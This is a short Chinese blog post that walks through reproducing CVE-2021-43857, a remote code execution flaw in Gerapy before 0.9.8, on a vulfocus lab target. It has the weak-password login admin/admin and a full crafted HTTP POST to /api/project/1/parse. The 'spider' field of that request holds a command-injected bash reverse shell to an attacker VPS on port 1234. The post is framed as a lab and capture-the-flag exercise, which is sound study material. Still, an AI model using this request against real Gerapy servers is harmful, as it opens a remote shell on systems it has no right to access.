Gerapy-CVE-2021-43857

背景:
Gerapy 是一个分布式爬虫管理框架。0.9.8 版本之前的 Gerapy 容易受到远程代码执行的影响,此问题已在 0.9.8 版本中修复。 登录:admin/admin 复现之前先登入后,创建一个项目。

漏洞编号:
CVE- 2021-43857

影响版本:
< 0.9.8

复现步骤:
1,打开漏洞环境vulfocus

2,使用弱口令进入后台,点击项目管理

3,抓包

4,构造数据包POST

POST /api/project/1/parse HTTP/1.1
Host: vulfocus.fofa.so:37380
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Token 4f2273e09d59f4de6edf58bb28d9f96e0fefd40e
Connection: close
Referer: http://vulfocus.fofa.so:37380/
Cookie: zbx_sessionid=80402dd7222257588aeff3a3f5a4b7af; td_cookie=448830462; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1639631760; zmGroup=1; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640325563
Cache-Control: max-age=0
Content-Length: 79
Content-Type: application/x-www-form-urlencoded

{
	"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/VPS IP/1234 0>&1'`"
}

5,VPS开启监听,并发送构造好的POST包

6,得到flag

posted @ 2022-01-13 10:12  Colin.B  阅读(519)  评论(0编辑  收藏  举报